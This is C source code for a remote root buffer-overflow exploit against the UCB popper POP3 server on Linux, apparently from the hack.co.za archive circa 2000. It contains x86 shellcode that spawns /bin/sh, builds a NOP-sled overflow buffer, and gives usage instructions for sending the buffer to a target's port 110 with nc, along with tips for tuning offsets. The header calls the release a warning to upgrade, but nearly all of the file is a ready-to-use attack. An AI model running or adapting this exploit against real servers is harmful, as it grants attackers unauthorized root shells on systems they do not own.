/*
 * Remote root exploit for UCB popper on Linux 
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 * 
 * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
 * Try adjusting offsets by 100.
 *
 * Tested on UCB Pop server (version 1.831beta) 
 * 
 * I figure it's safe to release this since UCB is not that 
 * common anymore.  But if you are still running it on your 
 * system(s), you had better upgrade.  This program shows you 
 * why.
 * 
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <unistd.h>
#include        <sys/errno.h>

/* Linux x86 shellcode */
char *shell=
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
  "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
  "\xff\xff/bin/sh";


#define ADDR 0xbffff1d8
#define OFFSET 0
#define BUFLEN 1100

char    buffer[BUFLEN];
int     offset=OFFSET;


int main (int argc, char *argv[])
{
  int i;

  if(argc > 2)
    {
      printf("Usage: %s [offset]\n",argv[0]);
      exit(0);
    }
  if(argc==2)
    offset=atoi(argv[1]);

  /* Set up the buffer */
  memset(buffer,0x90,BUFLEN);
  memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell));
  for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4)
    *(int *)&buffer[i]=ADDR-BUFLEN+100+offset;
  buffer[BUFLEN-1]='\n';

  printf("%s\n", buffer);
}
/*                    www.hack.co.za              [2000]*/